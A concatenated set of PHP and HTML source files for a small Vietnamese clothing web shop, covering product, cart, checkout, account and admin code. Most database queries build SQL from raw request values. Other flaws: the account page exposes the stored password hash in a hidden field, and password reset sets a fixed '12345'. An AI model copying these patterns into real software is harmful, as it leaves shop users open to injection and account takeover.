<li>
<span class="fa fa-envelope-o"></span>
<?php echo $_SESSION['mail'] ?>
</li>
</ul>
</div>
</div>
<div class="col-md-3 col-sm-4">
<div class="footer-support">
<div class="footer-title">
<h3>Chính sách</h3>
</div>
<div class="footer-menu">
<ul>
<li><a href="#">Điều khoản sử dụng</a></li>
<li><a href="#">Chính sách bảo mật</a></li>
<li><a href="#">Thuế-Giá trị gia tăng</a></li>
<!-- <li><a href="#">Về chúng tôi</a></li> -->
</ul>
</div>
</div>
</div>
<div class="col-md-3 col-sm-4">
<div class="footer-info">
<div class="footer-title">
<h3>Điều khoản</h3>
</div>
<div class="footer-menu">
<ul>
<li><a href="about-us.html">Về chúng tôi</a></li>
<li><a href="#">Cửa hàng</a></li>
<li><a href="#">Bản quyền</a></li>
<!-- <li><a href="#">Orders and Returns</a></li>
<li><a href="#">Site Map</a></li> -->
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- footer top area end -->
<!-- footer area start -->
<footer class="footer-area">
<div class="container">
<div class="row">
<div class="col-sm-6">
<div class="footer-copyright">
<p>Copyright © 2021 <a href="#"> <EMAIL></a>. Thank You</p>
</div>
</div>
<div class="col-sm-6">
<div class="payment-icon">
<img src="img/payment.png" alt="">
</div>
</div>
</div>
</div>
<a href="#" id="scrollUp"><i class="fa fa fa-arrow-up"></i></a>
</footer>
<!-- footer area end -->
<file_sep>/model/hang.php
<?php
require_once('ketnoi.php');
/**
 * Product detail, category, and feedback queries.
 */
class mathang
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function details_hang($id) // in progress
{
$query = "SELECT * from sanpham WHERE idSP = '$id'";
return $this->conn->query($query)->fetch_assoc();
}
function loaisanpham() // in progress
{
$query = "SELECT * from loaisanpham";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function layten_loaisanpham($id)
{
$query = "SELECT * FROM loaisanpham WHERE idLoaiSP = '$id'";
return $this->conn->query($query)->fetch_assoc();
}
function getcolor($id)
{
$query = " SELECT * FROM color INNER JOIN sanpham ON color.idcolor = sanpham.idcolor WHERE idSP = '$id'";
return $this->conn->query($query)->fetch_assoc();
}
function getsize($id)
{
$query = "SELECT * FROM size INNER JOIN sanpham ON size.idsize = sanpham.idsize WHERE idSP='$id'";
return $this->conn->query($query)->fetch_assoc();
}
function sanpham_cuahangtheoid($idLoaiSP) // in progress
{
$query = "SELECT * FROM sanpham WHERE idLoaiSP = $idLoaiSP";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
// show related products
function sanphamlienquan($id)
{
$query = " SELECT * FROM sanpham WHERE idLoaiSP = '$id' limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
// feedback
function them_gopy($idSP, $email, $noidung)
{
$query = "INSERT INTO gopy(idSP, email, noidung) VALUES ('$idSP', '$email', '$noidung')" ;
$result = $this->conn->query($query);
}
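    // Hedged sketch (an addition, not the original author's code): them_gopy()
    // above interpolates raw input into SQL; a parameterized variant on the
    // same mysqli connection could look like this.
    function them_gopy_prepared($idSP, $email, $noidung)
    {
        $stmt = $this->conn->prepare(
            "INSERT INTO gopy(idSP, email, noidung) VALUES (?, ?, ?)");
        $stmt->bind_param('iss', $idSP, $email, $noidung);
        return $stmt->execute();
    }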
function xem_gopy()
{
$query = "SELECT * FROM gopy";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
}
?><file_sep>/views/home/home.php
<?php require_once('./views/slider/slider.php'); ?>
<!-- new products area start -->
<div class="new-product home2">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="product-title">
<h2>Sản Phẩm Mới</h2>
<a href="?action=cuahang1" style="margin-left:60%" id="textid">Xem tất cả >></a>
</div>
</div>
</div>
<div class="row">
<div class="features-home2-slider">
<?php foreach ($data_sanphamtrangchu as $value) { ?>
<div class="col-md-12">
<div class="single-product">
<div class="level-pro-new">
<span>new</span>
</div>
<div class="product-img">
<a href="?action=cuahang&id=<?php echo $value['idLoaiSP'] ?>" title="" class="thumb">
<img class="primary-img-1" src="admin/public_admin/image/sanpham/<?php echo $value['anh1'] ?>" alt="">
<img class="primary-img-2" src="admin/public_admin/image/sanpham/<?php echo $value['anh2'] ?>" alt="">
</a>
</div>
<div class="actions">
<a href="?action=giohang&act=add_giohang&id=<?= $value['idSP'] ?>">
<button onclick="" type="submit" class="cart-btn" title="Add to cart">Cart</button></a>
<ul class="add-to-link">
<li><a class="modal-view" href="?action=chitietmathang&id=<?= $value['idSP'] ?>&idLoaiSP=<?= $value['idLoaiSP'] ?>"> <i class="fa fa-search"></i></a></li>
<li><a href="../wishlist/index"> <i class="fa fa-heart-o"></i></a></li>
</ul>
</div>
<div class="product-price">
<div class="product-name">
<a href="" title="" class="name-product"> <?php echo $value['tenSP'] ?> </a>
</div>
<div class="price-rating">
<span><?= number_format($value['Dongia']); ?> VND</span>
<div class="ratings">
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star-half-o"></i>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
</div>
<!-- new products area start -->
<?php foreach ($data_loaisanphamhome as $row) : ?>
<div class="new-product home2">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="product-title">
<h2><?= $row['tenLSP'] ?></h2>
</div>
</div>
</div>
<div class="row">
<div class="features-home2-slider">
<?php foreach ($data_allsanphamtrangchu as $value) :
if ($row['idLoaiSP'] == $value['idLoaiSP']) {
?>
<div class="col-md-12">
<div class="single-product">
<div class="level-pro-new">
<span>new</span>
</div>
<div class="product-img">
<a href="?action=cuahang&id=<?php echo $value['idSP'] ?>" title="" class="thumb">
<img class="primary-img-1" src="admin/public_admin/image/sanpham/<?= $value['anh1'] ?>" alt="">
<img class="primary-img-2" src="admin/public_admin/image/sanpham/<?= $value['anh2'] ?>" alt="">
</a>
</div>
<div class="actions">
<a href="?action=giohang&act=add_giohang&id=<?= $value['idSP'] ?>">
<button onclick="" type="submit" class="cart-btn" title="Add to cart">Cart</button></a>
<ul class="add-to-link">
<li><a class="modal-view" href="?action=chitietmathang&id=<?= $value['idSP'] ?>&idLoaiSP=<?= $value['idLoaiSP'] ?>"> <i class="fa fa-search"></i></a></li>
<li><a href="../wishlist/index"> <i class="fa fa-heart-o"></i></a></li>
</ul>
</div>
<div class="product-price">
<div class="product-name">
<a href="" title="" class="name-product"> <?php echo $value['tenSP'] ?> </a>
</div>
<div class="price-rating">
<span><?= number_format($value['Dongia']); ?> VND</span>
<div class="ratings">
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star-half-o"></i>
</div>
</div>
</div>
</div>
</div>
<?php }
endforeach ?>
</div>
</div>
</div>
</div>
<?php endforeach ?>
<!-- <?php// require_once('./views/sanphammoinhat/sanphammoinhat.php'); ?> --><file_sep>/admin/controller_admin/quanlyloaisanpham.php
<?php
// Controller: calls the functions in the model layer
require_once('./model_admin/loaisanpham.php'); // include works
/**
 * Product category admin controller.
 */
class loaisanphamcontroller
{
var $loaisanpham_model;
public function __construct()
{
$this->loaisanpham_model = new loaisanpham();
}
public function list()
{
if(isset($_POST['timkiem_lsp'])){
$timkiem_lsp = $_POST['timkiem_lsp'];
$data = $this->loaisanpham_model->timkiem_lsp($timkiem_lsp);
}else{
$data = $this->loaisanpham_model->all();
}
require_once('views_admin/index.php');
}
public function details()
{
$id = isset($_GET['id']) ? $_GET['id'] : 1;
$data = $this->loaisanpham_model->find($id);
require_once('views_admin/index.php');
}
public function update()
{
$idLoaiSP = filter_input(INPUT_POST, 'idLoaiSP');
$tenLSP = filter_input(INPUT_POST, 'tenLSP');
$this->loaisanpham_model->update($idLoaiSP, $tenLSP);
}
public function them()
{
$tenLSP = filter_input(INPUT_POST, 'tenLSP');
$this->loaisanpham_model->insert($tenLSP);
}
public function xoaloaisanpham() // đang
{
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$this->loaisanpham_model->delete($id);
}
}
?><file_sep>/views/taikhoannguoidung/taikhoannguoidung.php
<!-- pages-title-start -->
<div class="shopping-cart">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="index.html" title="go to homepage">Home<span>/</span></a> </li>
<li><strong>Login page</strong></li>
</ul>
</div>
</div>
</div>
</div>
</div>
<div class="pages-title section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12">
<div class="pages-title-text text-center">
<h2>Thông tin tài khoản</h2>
</div>
</div>
</div>
</div>
</div>
<section id="cart_items" style="margin-top: -50px; margin-bottom: -50px;">
<div class="container">
<div class="breadcrumbs">
<ol class="breadcrumb">
<li><a href="#">Home</a></li>
<li class="active">Tài khoản người dùng</li>
</ol>
</div>
</div>
</section>
<!-- pages-title-end -->
<!-- My account content section start -->
<section class="pages my-account-page section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12 col-sm-12">
<div class="padding60">
<div class="log-title">
<h3><strong>Tài khoản của tôi</strong></h3>
</div>
<div class="prament-area main-input" id="doitk">
<ul class="panel-group" id="accordion">
<li class="panel">
<div class="account-title" data-toggle="collapse" data-parent="#accordion" data-target="#collapse1">
<label>
<input type="radio" checked value="forever" name="rememberme">
Thông tin cá nhân
</label>
</div>
<div id="collapse1" class="panel-collapse collapse in">
<div class="single-log-info">
<div class="bulling-title">
<div class="custom-input">
<form action="?action=suataikhoan" method="POST">
<input type="hidden" name="idUser" value="<?php echo $data_taikhoan['idUser'] ?>" required>
<div class="row">
<div class="col-md-6">
<input type="text" name="ho" placeholder="Họ.." value="<?php echo $data_taikhoan['ho'] ?>" required>
</div>
<div class="col-md-6">
<input type="text" name="ten" placeholder="Tên.." value="<?php echo $data_taikhoan['ten'] ?>" required>
</div>
</div>
<input type="text" name="email" placeholder="Email.." value="<?php echo $data_taikhoan['email'] ?>" required>
<input type="text" name="diachi" placeholder="Địa chỉ.." value="<?php echo $data_taikhoan['diachi'] ?>" required >
<div class="custom-select">
<select class="form-control" name="gioitinh" title="Giới tính" style="width:20%">
<option value="Nam" > Nam</option>
<option value="Nữ"> Nữ</option>
<option value="Khác"> Khác</option>
</select>
</div>
<input type="text" name="sodienthoai" placeholder="Số điện thoại.." pattern="[0-9]+" minlength="9" value="<?php echo $data_taikhoan['sodienthoai'] ?>" required/>
<input type="text" name="tendangnhap" placeholder="Tên đăng nhập.." value="<?php echo $data_taikhoan['tendangnhap'] ?>" required/>
<!-- <input type="text" name="matkhau" placeholder="Mật khẩu.." pattern="[0-9]+"
minlength="5" value="<?php echo $data_taikhoan['matkhau'] ?>" required/>
-->
<div class="submit-text">
<button type="submit">Lưu</button>
</div>
</form>
</div>
</div>
</div>
</li>
<!-- change password -->
<li class="panel">
<div class="account-title" data-toggle="collapse" data-parent="#accordion" data-target="#collapse4">
<label>
<input type="radio" value="forever" name="rememberme" />
Đổi mật khẩu
</label>
</div>
<div id="collapse4" class="panel-collapse collapse">
<div class="single-log-info">
<div class="custom-input">
<form action="#" method="post" onsubmit="return validate()">
<input type="hidden" name="idUser" value="<?php echo $data_taikhoan['idUser'] ?>">
<?php $matkhau_md5 = $data_taikhoan['matkhau']; ?>
<input id="matkhauchinh" type="hidden" value="<?php echo $matkhau_md5; ?>">
<input id="mk_ht" type="password" placeholder="Mật khẩu hiện tại .. " name="matkhau" minlength="5">
<input id="mk" type="password" placeholder="Mật khẩu mới .. " name="matkhaumoi" />
<input id="nhaplai_mk" type="password" placeholder="Xác nhận lại mật khẩu .." name="xacnhanmatkhau" >
<div class="submit-text text-left">
<button type="submit_pw" value="submit form">Lưu</button>
</div>
</form>
</div>
</div>
</div>
</li>
<!-- end change password -->
</ul>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- my account content section end -->
<script>
function validate() {
/*var mkchinh = document.getElementById("matkhauchinh").value; */
var p =document.getElementById("mk_ht").value;
var p1 = document.getElementById("mk").value;
var p2 = document.getElementById("nhaplai_mk").value;
/*
if(mkchinh != p ){
alert("Bạn đã nhập sai mật khẩu");
return false;
}
*/
if(p1 == "") {
alert("Vui lòng nhập mật khẩu!");
return false;
}
if(p2 == "") {
alert("Vui lòng xác minh mật khẩu!");
return false;
}
if(p1 != p2){
alert("Mật Khẩu Nhập Lại Không Đúng");
return false;
}
return true;
}
</script><file_sep>/controller/hoanthanhdonhang_controller.php
<?php
// require_once('views/index.php'); // calling this is what renders the view
require_once('./model/hoanthanhdonhang.php');
/**
 * Order completion controller.
 */
class hoanthanhdonhang
{
var $hoanthanhdonhang_controller;
function __construct()
{
$this->hoanthanhdonhang_controller = new hoanthanh_donhang();
}
    public function list()
    {
        if (!isset($_SESSION['tendangnhap'])) {
            header('location: ?action=dangnhap');
            exit;
        }
        $tendangnhap = $_SESSION['tendangnhap'];
        $data_user = $this->hoanthanhdonhang_controller->chitiet_donhang($tendangnhap);
        $data_loaisanpham = $this->hoanthanhdonhang_controller->loaisanpham();
        // $idUser = isset($_GET['idUser']) ? $_GET['idUser'] : '0';
        // $idSP = isset($_GET['idSP']) ? $_GET['idSP'] : '0';
        // $tongtien = isset($_GET['tongtien']) ? $_GET['tongtien'] : $_GET['tongtien_KM'];
        // one hoadon row is written per cart line
        foreach ($_SESSION['sanpham'] as $key => $value) {
            $idUser = isset($_GET['idUser']) ? $_GET['idUser'] : '1';
            $idSP = $value['idSP'];
            $tongtien = $value['Dongia'] * $value['soluong'];
            $soluongmua = $value['soluong'];
            $ngaymua = date("Y-m-d");
            $this->hoanthanhdonhang_controller->gui_donhang_choadmin($idUser, $idSP, $tongtien, $soluongmua, $ngaymua);
        }
        require_once('views/index.php');
}
public function huy_session()
{
if(isset($_SESSION['sanpham'])){
unset($_SESSION['sanpham']);
unset($_SESSION['giatriKM']); // added to clear the session
unset($_SESSION['tongtien_KM']); // added to clear the session
unset($_SESSION['tongtien']); // added to clear the session
echo "<script language='javascript'>";
echo "location.href='?action=trangchu';</script>";
}
}
}
?><file_sep>/admin/controller_admin/quanlytaikhoan.php
<?php
// Controller: calls the functions in the model layer
require_once('./model_admin/nguoidung.php'); // include works
/**
 * User account admin controller.
 */
class nguoidungcontroller
{
var $nguoidung_model;
public function __construct()
{
$this->nguoidung_model = new nguoidung();
}
public function list() // lists every user account in the database
{
if(isset($_POST['timkiem'])){
$timkiem = $_POST['timkiem'];
$data = $this->nguoidung_model->timkiem($timkiem);
}else{
$data = $this->nguoidung_model->all();
}
require_once('views_admin/index.php');
}
public function details() // shows details for the user selected by $id
{
$id = isset($_GET['id']) ? $_GET['id'] : 1;
$data = $this->nguoidung_model->find($id);
require_once('views_admin/index.php');
}
public function edit()
{
$id = isset($_GET['id']) ? $_GET['id'] : 1;
$data = $this->nguoidung_model->find($id);
require_once('views_admin/index.php');
}
public function update()
{
$ho = filter_input(INPUT_POST, 'ho');
$ten =filter_input(INPUT_POST, 'ten');
$email =filter_input(INPUT_POST, 'email');
$diachi =filter_input(INPUT_POST, 'diachi');
$gioitinh =filter_input(INPUT_POST, 'gioitinh');
$sodienthoai =filter_input(INPUT_POST, 'sodienthoai');
$tendangnhap =filter_input(INPUT_POST, 'tendangnhap');
$matkhau =filter_input(INPUT_POST, 'matkhau');
$idUser = filter_input(INPUT_POST, 'id');
$this->nguoidung_model->update($idUser, $ho, $ten, $email, $diachi, $gioitinh, $sodienthoai, $tendangnhap, $matkhau);
}
public function them()
{
$ho = filter_input(INPUT_POST, 'ho');
$ten =filter_input(INPUT_POST, 'ten');
$email =filter_input(INPUT_POST, 'email');
$diachi =filter_input(INPUT_POST, 'diachi');
$gioitinh =filter_input(INPUT_POST, 'gioitinh');
$sodienthoai =filter_input(INPUT_POST, 'sodienthoai');
$tendangnhap =filter_input(INPUT_POST, 'tendangnhap');
$matkhau =filter_input(INPUT_POST, 'matkhau');
$this->nguoidung_model->insert($ho, $ten, $email, $diachi, $gioitinh, $sodienthoai, $tendangnhap, $matkhau);
}
public function xoanguoidung()
{
$id = isset($_GET['id']) ? $_GET['id'] : '';
$this->nguoidung_model->delete($id);
}
public function phanquyen()
{
$id = isset($_GET['id']) ? $_GET['id'] : '';
$quyen = $_GET['quyen'];
$this->nguoidung_model->phanquyen($id, $quyen);
}
}
?><file_sep>/controller/thanhtoan_controller.php
<?php
// require_once('views/index.php'); // calling this is what renders the view
require_once('./model/show_thanhtoan.php');
/**
 * Checkout controller.
 */
class showthanhtoan
{
var $thanhtoan_controller;
function __construct()
{
$this->thanhtoan_controller = new thanhtoan();
}
    public function list()
    {
        if (!isset($_SESSION['tendangnhap'])) {
            header('location: ?action=dangnhap');
            exit;
        }
        $tendangnhap = $_SESSION['tendangnhap'];
        $data_user = $this->thanhtoan_controller->chitiet_donhang($tendangnhap);
        $data_loaisanpham = $this->thanhtoan_controller->loaisanpham();
        $Dongia = isset($_GET['a']) ? $_GET['a'] : '1';
        $data_sanpham = $this->thanhtoan_controller->chitiet_sanpham($Dongia);
        require_once('views/index.php');
    }
}
?><file_sep>/views/index.php
<?php
if (isset($data_layout)) {
    foreach ($data_layout as $value) {
        $_SESSION['mail'] = $value['mail'];
        $_SESSION['phone'] = $value['phone'];
        $_SESSION['diachi'] = $value['diachi'];
    }
}
?>
<!doctype html>
<html class="no-js" lang="">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>Hồng An Store</title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- favicon
============================================ -->
<link rel="shortcut icon" type="image/x-icon" href="img/favicon.ico">
<!-- Bootstrap CSS
============================================ -->
<link rel="stylesheet" href="public/css/bootstrap.min.css">
<!-- Bootstrap CSS
============================================ -->
<link rel="stylesheet" href="public/css/font-awesome.min.css">
<!-- owl.carousel CSS
============================================ -->
<link rel="stylesheet" href="public/css/owl.carousel.css">
<link rel="stylesheet" href="public/css/owl.theme.css">
<link rel="stylesheet" href="public/css/owl.transitions.css">
<!-- jquery-ui CSS
============================================ -->
<link rel="stylesheet" href="public/css/jquery-ui.css">
<!-- meanmenu CSS
============================================ -->
<link rel="stylesheet" href="public/css/meanmenu.min.css">
<!-- nivoslider CSS
============================================ -->
<link rel="stylesheet" href="public/lib/css/nivo-slider.css">
<link rel="stylesheet" href="public/lib/css/preview.css">
<!-- animate CSS
============================================ -->
<link rel="stylesheet" href="public/css/animate.css">
<!-- magic CSS
============================================ -->
<link rel="stylesheet" href="public/css/magic.css">
<!-- normalize CSS
============================================ -->
<link rel="stylesheet" href="public/css/normalize.css">
<!-- main CSS
============================================ -->
<link rel="stylesheet" href="public/css/main.css">
<!-- style CSS
============================================ -->
<link rel="stylesheet" href="public/style.css">
<!-- responsive CSS
============================================ -->
<link rel="stylesheet" href="public/css/responsive.css">
<!-- modernizr JS-->
<link rel="stylesheet" type="text/css" href="public2/css/style.css">
<script src="theme/js/vendor/modernizr-2.8.3.min.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>
<?php
require_once('header/header2.php');
?>
<?php
require_once('dieuhuong.php');
?>
<?php
require_once('footer/footer.php');
?>
<!-- jquery
============================================ -->
<script src="public/js/vendor/jquery-1.12.1.min.js"></script>
<!-- bootstrap JS
============================================ -->
<script src="public/js/bootstrap.min.js"></script>
<!-- wow JS
============================================ -->
<script src="public/js/wow.min.js"></script>
<!-- price-slider JS
============================================ -->
<script src="public/js/jquery-price-slider.js"></script>
<!-- nivoslider JS
============================================ -->
<script src="theme/lib/js/jquery.nivo.slider.js"></script>
<script src="theme/lib/home.js"></script>
<!-- meanmenu JS
============================================ -->
<script src="public/js/jquery.meanmenu.js"></script>
<!-- owl.carousel JS
============================================ -->
<script src="public/js/owl.carousel.min.js"></script>
<!-- elevatezoom JS
============================================ -->
<script src="public/js/jquery.elevatezoom.js"></script>
<!-- scrollUp JS
============================================ -->
<script src="public/js/jquery.scrollUp.min.js"></script>
<!-- plugins JS
============================================ -->
<script src="public/js/plugins.js"></script>
<!-- main JS
============================================ -->
<script src="public/js/main.js"></script>
</body>
</html><file_sep>/views/giohang/giohang.php
<style>
.x:hover {
background-color: #E03550;
color: white;
}
.buttonx {
background-color: transparent;
border: 1px solid #eee;
color: #959595;
font-size: 12px;
font-weight: 500;
line-height: 34px;
padding: 10px 15px;
text-transform: uppercase;
font-family: "Montserrat", sans-serif;
transition: all 0.3s ease 0s;
}
</style>
<!-- cart item area start -->
<div class="shopping-cart">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="index.html" title="go to homepage">Home<span>/</span></a> </li>
<li><strong> Shopping cart</strong></li>
</ul>
</div>
</div>
</div>
<div class="row">
<div class="col-md-12">
<div class="table-responsive">
<form action="?action=thanhtoan&a=<?php foreach ($_SESSION['sanpham'] as $value) {
echo $value['Dongia'] . '&b=';
} ?>" method="POST">
<table class="table-bordered ">
<thead>
<tr>
<th class="cart-item-img">Sản Phẩm</th>
<th class="cart-product-name">Thông tin sản phẩm</th>
<th class="edit">Đơn giá</th>
<th class="edit">Số lượng mua</th>
<th class="move-wishlist">Số lượng kho</th>
<th class="unit-price">Thành tiền</th>
<th class="remove-icon">Delete</th>
</tr>
</thead>
<tbody class="text-center">
<?php if (isset($_SESSION['sanpham'])) {
$_SESSION['tongtien'] = 0;
foreach ($_SESSION['sanpham'] as $value) {
?>
<!-- $key là id sp -->
<tr>
<td class="cart-item-img">
<a href="single-product.html">
<img height='90' width="100" src="admin/public_admin/image/sanpham/<?= $value['anh1'] ?>">
</a>
</td>
<td class="cart-product-name">
<a href="#"><?= $value['tenSP'] ?></a>
</td>
<td class="move-wishlist">
<a href="#"><?= number_format($value['Dongia']) ?> VND</a>
</td>
<td class="unit-price">
<span>
<div class="cart_quantity_button">
<?php
if ($value['soluong_kho'] > 0) { ?>
<a class="cart_quantity_up" href="?action=giohang&act=update_giohang&id=<?= $value['idSP'] ?>"> + </a>
<?php } else { ?>
<a class="cart_quantity_up" href="" onclick="TB_hethang()"> + </a>
<?php } ?>
<input class="cart_quantity_input" style="text-align:center" size="2" type="text" name="soluong" value="<?php echo $value['soluong']; ?>">
<a class="cart_quantity_down" href="?action=giohang&act=update_giohang_tru&id=<?= $value['idSP'] ?>"> - </a>
</div>
</span>
</td>
<td class="quantity">
<span>
<?php
if ($value['soluong_kho'] < 0) {
echo "Lỗi";
} else {
echo $value['soluong_kho'];
}
?></span>
</td>
<td class="subtotal">
<span><?php $_SESSION['tongtien'] += $value['thanhtien'];
echo number_format($value['thanhtien']); ?> VND</span>
</td>
<td class="remove-icon">
<a href="?action=giohang&act=xoagiohang&id=<?= $value['idSP'] ?>">
<img src="public/img/cart/btn_remove.png" alt="xoa">
</a>
</td>
</tr>
<?php
}
} ?>
</tbody>
</table>
<div class="shopping-button">
<div class="continue-shopping x">
<a class="buttonx" href="?action=trangchu">Tiếp tục mua
</a>
</div>
<div class="shopping-cart-left x">
<a class="buttonx" href="?action=giohang&act=xoagiohang_all">
Hủy giỏ hàng
</a>
</div>
</div>
</div>
</div>
</div>
<div class="row">
<!-- <div class="col-sm-4">
<div class="discount-code">
<h3>Discount Codes</h3>
<p>Enter your coupon code if you have one.</p>
<input type="text">
<div class="shopping-button">
<button type="submit">apply coupon</button>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="estimate-shipping">
<h3>Estimate Shipping and Tax</h3>
<p>Enter your destination to get a shipping estimate.</p>
<form action="#">
<div class="form-box">
<div class="form-name">
<label> country <em>*</em> </label>
<select>
<option value="1">Afghanistan</option>
<option value="1">Algeria</option>
<option value="1">American Samoa</option>
<option value="1">Australia</option>
<option value="1">Bangladesh</option>
<option value="1">Belgium</option>
<option value="1">Bosnia and Herzegovina</option>
<option value="1">Chile</option>
<option value="1">China</option>
<option value="1">Egypt</option>
<option value="1">Finland</option>
<option value="1">France</option>
<option value="1">United State</option>
</select>
</div>
</div>
<div class="form-box">
<div class="form-name">
<label> State/Province </label>
<select>
<option value="1">Please select region, state or province</option>
<option value="1">Arizona</option>
<option value="1">Armed Forces Africa</option>
<option value="1">California</option>
<option value="1">Florida</option>
<option value="1">Indiana</option>
<option value="1">Marshall Islands</option>
<option value="1">Minnesota</option>
<option value="1">New Mexico</option>
<option value="1">Utah</option>
<option value="1">Virgin Islands</option>
<option value="1">West Virginia</option>
<option value="1">Wyoming</option>
</select>
</div>
</div>
<div class="form-box">
<div class="form-name">
<label> Zip/Postal Code </label>
<input type="text">
</div>
</div>
<div class="shopping-button">
<button type="submit">get a quote</button>
</div>
</form>
</div>
</div> -->
<div class="col-sm-4">
</div>
<div class="col-sm-4">
</div>
<div class="col-sm-4">
<div class="totals">
<!-- <p>subtotal <span>$1,540.00</span> </p> -->
<div style="display:flex; justify-content:flex-end">
<h3>Tổng Tiền <span>
<?= isset($_SESSION['tongtien']) ? number_format($_SESSION['tongtien']) . ' VND' : "0"; ?>
</span></h3>
</div>
<div class="shopping-button" style="margin-bottom: 5px;">
<button type="submit">Xác nhận thanh toán</button>
</div>
</div>
</div>
</div>
</form>
</div>
</div>
<!-- cart item area end -->
<script>
function TB_hethang() {
alert("Sản phẩm trong kho đã hết!");
}
</script><file_sep>/model/hoanthanhdonhang.php
<?php
require_once('ketnoi.php');
/**
*
*/
class hoanthanh_donhang
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function loaisanpham() //đang
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function chitiet_donhang($tendangnhap)
{
$query = "SELECT * FROM user WHERE tendangnhap = '$tendangnhap'";
$data = $this->conn->query($query)->fetch_assoc();
return $data;
}
function gui_donhang_choadmin($idUser, $idSP, $tongtien, $soluongmua, $ngaymua)
{
$query = "INSERT INTO hoadon (idUser, idSP, tongtien, soluongmua, ngaymua) VALUES ('$idUser', '$idSP', '$tongtien', '$soluongmua', '$ngaymua')";
$result = $this->conn->query($query);
}
}
?><file_sep>/views/dangnhap/quenmk.php
<div class="shopping-cart">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="index.html" title="go to homepage">Home<span>/</span></a> </li>
<li><strong>Login page</strong></li>
</ul>
</div>
</div>
</div>
</div>
</div>
<div class="login-area">
<div class="container">
<!-- <div class="row">
<div class="col-xs-12">
<div class="section-title text-center">
<div class="product-tab">
<ul>
<li class="active dangnhap"><a data-toggle="tab" href="#arrival">Quên mật khẩu</a></li>
</ul>
</div>
</div>
</div>
</div> -->
<div class="text-center tab-content login">
<div class="tab-pane fade in active login-form-container" id="arrival">
<div class="wrapper">
<ul class="load-list load-list-three">
<li>
<div class="row text-center">
<div class="container">
<div class="roww">
<div class="col-xs-12 col-sm-12 col-md-4 well well-sm col-md-offset-4 onee">
<legend>
Hãy nhập thông tin của bạn
</legend>
<form action="?action=laymatkhau_submit" method="POST" class="form" role="form">
<input class="form-control" type="text" name="email_laymk" placeholder="Nhập Email của bạn">
<button class="btn btn-lg btn-primary btn-block button2" type="submit" name="submit">Lấy mật khẩu</button>
</form>
<div class="text-center">
<br>
<span> Bạn đã có tài khoản? </span>
<a class="dn" href="?action=dangnhap" title="">Đăng nhập</a>
</div>
<div class="text-center">
<br>
</div>
</div>
</div>
</div>
<center>
<span class="pull-right" style="font-size: 15px; color: blue; margin-top: -250px;">
<?php if (isset($ketqua)) {
    echo 'Có tồn tại email, bạn hãy đăng nhập với mật khẩu mới là: 12345 <br> Lưu ý: bạn nên đổi mật khẩu để tăng bảo mật cho tài khoản!';
}
?>
</span>
</center>
</div>
</li>
</ul>
</div>
</div>
<!-- popular product end -->
</div>
</div>
</div><file_sep>/controller/home_controller.php
<?php
// require_once('views/index.php'); // calling this is what renders the view
require_once('./model/show_home.php');
/**
 * Home page controller.
 */
class showhome
{
var $home_controller;
function __construct()
{
$this->home_controller = new home();
}
public function list()
{
$data_banner = $this->home_controller->banner();
$data_loaisanpham = $this->home_controller->loaisanpham();
$data_loaisanphamhome = $this->home_controller->loaisanphamHome();
$data_allsanphamtrangchu = $this->home_controller->allsanpham_trangchu();
$data_sanphamtrangchu = $this->home_controller->sanpham_trangchu();
$data_layout = $this->home_controller->layout();
require_once('views/index.php');
}
}
?><file_sep>/admin/views_admin/trangchu/inde.php
<div id="viewport">
<div class="container-fluid" id="noidung">
<h1>THỐNG KÊ</h1>
<form action="?action=trangchu" method="POST">
<input type="date" name="ngay_gui">
<input type="submit" value="Gửi">
</form>
<br>
<div class="col-sm-4">
<div class="div1">
Doanh thu <?php echo $loai_ngay; ?><br>
- Có <?php $dem1 = 0; $tongthu1=0; foreach ($thongke_hoadon_ngay as $key => $value) {
$dem1++;
$tongthu1 += $value['tongtien'];
} ?>
<span style="color: orange"><?php echo $dem1;?></span> hóa đơn<br>
- Tổng thu<span style="color: orange"> <?php echo $tongthu1.'.000 VND'; ?> </span>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
Doanh thu Tháng <?php echo $loai_thang; ?><br>
- Có <?php $dem1 = 0; $tongthu1=0; foreach ($thongke_hoadon_thang as $key => $value) {
$dem1++;
$tongthu1 += $value['tongtien'];
} ?>
<span style="color: orange"><?php echo $dem1;?></span> hóa đơn<br>
- Tổng thu <span style="color: orange"><?php echo $tongthu1.'.000 VND'; ?></span>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
Doanh thu Năm <?php echo $loai_nam; ?><br>
